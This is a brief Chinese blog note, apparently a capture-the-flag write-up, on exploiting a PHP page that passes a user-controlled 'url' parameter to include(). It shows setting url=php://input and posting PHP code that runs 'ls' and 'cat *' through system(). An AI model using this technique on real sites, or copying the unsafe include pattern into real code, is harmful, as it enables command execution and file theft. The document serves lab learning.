include与php://input执行任意命令
题目地址https://ctf.show/challenges#web3-8
条件是include(xxx);
xxx参数可以控制
代码如下:
<?php include($_GET['url']);?>
构造url=php://input
传入
<?php system("ls"); ?>
<?php system("cat *"); ?>
[博客内容只是本人学习过程记录的笔记,不保证质量.本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言.]